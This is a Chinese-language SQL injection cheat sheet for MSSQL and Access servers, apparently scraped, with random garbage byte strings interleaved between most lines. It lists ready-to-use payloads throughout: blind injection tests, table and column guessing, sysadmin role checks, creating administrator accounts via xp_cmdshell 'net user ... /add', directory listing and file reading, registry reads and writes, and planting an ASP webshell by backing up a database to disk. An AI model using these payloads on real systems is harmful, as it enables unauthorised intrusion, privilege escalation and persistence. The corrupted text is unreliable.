1.判断是否有注入;and 1=1 ;and 1=2 cTKj1)!z?X
2.初步判断是否是mssql ;and user>0 =$B:i�>z<�
H�\�f.a R=
3.注入参数是字符'and [查询条件] and ''=' -�Kj^ l3�w
[Ng#/QXk�{
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �^G,]("di`
Y9T�aU]7�]
5.判断数据库系统 [��T;0vv�8
O)'Bx=S4Ke
;and (select count(*) from sysobjects)>0 mssql G<C[��A
�
4Lx#�5}��P
;and (select count(*) from msysobjects)>0 access `�N~;X~XFk
�/\�-�q�z$
k�,x��Y\r$
_u^� �S�[�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 )g9&fG��Yf
R4�<�}kA,.
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 F6�gboo)SD
�\e5��bx�c
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Ly�?gpOqu5
�TR��8��<=
9.(1)猜字段的ascii值(access) ��h��sVf/%
g/�b_\__�A
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 r/E;tm��[\
s@�sr�.'yU
(2)猜字段的ascii值(mssql) b�lcd]7nK�
�z?HP%g'M~
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 D�>u1ngu��
K�.c�M�uh�
10.测试权限结构(mssql) ��sl��V+2b
n"dC]�&G'�
�^D(�N_va<
,���C88%k�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �3,8>\y�f`
5-V�d��q��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ?�S�j3-*/?
o�c�CC63�J
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �KZ/U2.{O<
m4{F�-++dk
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �vdlo�h� ,
F:.rb
Ei�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- (gQ^jmZPG�
�DFK�U?�#R
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- wRL=9/5(�8
0/�d+2�6lR
;and 1=(select IS_MEMBER('db_owner'));-- h���L#5:~(
�$UM�x�O`F
�'�~{^c�}�
GZ#��6}/;b
11.添加mssql和系统的帐户 `}ak;^Me��
�$srb!&~_>
;exec master.dbo.sp_addlogin username;-- ��9x/HQ(�1
;exec master.dbo.sp_password null,username,password;-- =PiD��ZS^"
#pbPaR�JL(
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ,� �;�L��
%EYh5�W���
;exec master.dbo.xp_cmdshell 'net user username password �-b��"7WBl
�XU�mL��8�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �Yxy�e?R-:
�w�#w�lZ1f
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 0 !�yvcviw
=e/{fUg8f�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 'f9�fw^�
tuuc�9H�4B
�;aKdRhDo�
PR=:3�-#R�
12.(1)遍历目录 p#W[��h�e�
i�h�a�{(�-
;create table dirs(paths varchar(100), id int) & IVw��m"�
$����Scb8<
;insert dirs exec master.dbo.xp_dirtree 'c:\' �7u]0�d�Hj
�]q DhG�t�
;and (select top 1 paths from dirs)>0 aJlSIw*Q,�
+2!J�3{[J
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) zXQ�o pQ1�
D;.�O�#�bS
V`$J�a�n��
z5PFpp��SQ
(2)遍历目录 GUJ[2/V�~A
K^b��zZa+a
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :1"{0���gm
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �h%��
BA,C
gNJ,Bj �Pd
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 j�A R��@?X
h�c}d�S$=C
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 DQM\Y{y|3�
���d�:C- �
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 _I�J�PZ'Hr
�Q6Z%T�.�1
w4U]lg�<}E
7Wb:^.d
g�
13.mssql中的存储过程 ,J�u���� f
A2VN%�dB��
xp_regenumvalues 注册表根键, 子键 K2,oP )0.Y
�r+f�R^hv
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �=D.M}x�qo
t6�&��6kl�
xp_regread 根键,子键,键值名 #W,BUN�}��
�_sI�hQ8$:
;exec xp_regread a�b8�uY.�j
*[jG^w0z8~
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Vy�H'�7_aU
y6ntGr�Z}$
xp_regwrite 根键,子键, 值名, 值类型, 值 ^OK�Cv�d�S
<�d~P�;R(@
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 DytH�} U"
~TC�z1UW�V
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 S0�n�BX"$u
�Um��9G�jd
xp_regdeletevalue 根键,子键,值名 r�mmN2+��H
>��=-w2&
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 vwDnz��/-�
]5W0zNb*�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 WUx�}+3eWv
v;�"��[1w}
vt}+d
StUm
8qL��*Nf��
14.mssql的backup创建webshell Xk�%92Pt�o
g#q�t<�d}j
use model @ROMHMd�}
�iLw O��4i
create table cmd(str image); �wvsKn�YKX
Ub=g<MYHV�
insert into cmd(str) values (''); 7Uvf�XzDNC
PeGL
Rbx34
backup database model to disk='c:\l.asp'; )K�.�~A&y@
�ko\V�Dyt,
s@sRdoTdF
�!K^.r_0H.
15.mssql内置函数 IBW�U�XG;�
s� �7�re��
;and (select @@version)>0 获得Windows的版本号 _2+�}_ �>d
|r5� n���p
;and user_name()='dbo' 判断当前系统的连接用户是不是sa u�c9t0]o=h
��}I�<r=�?
;and (select user_name())>0 爆当前系统的连接用户 $�6.CN��#�
�8�B�;wn<O
;and (select db_name())>0 得到当前连接的数据库 :iJ+�ImBpK
n�Ph�5�(&E
���K�C�d}N
�%cMX]���U
16.简洁的webshell �?W�E#%W7U
:�&ir5x�HS
use model <4�S�Y'-�w
IMLk{y�%6�
create table cmd(str image); �T!e���]�=
)$K )`uqb�
insert into cmd(str) values (''); =?�>f[J5��
� f.acH]p�
backup database model to disk='g:\wwwtest\l.asp';
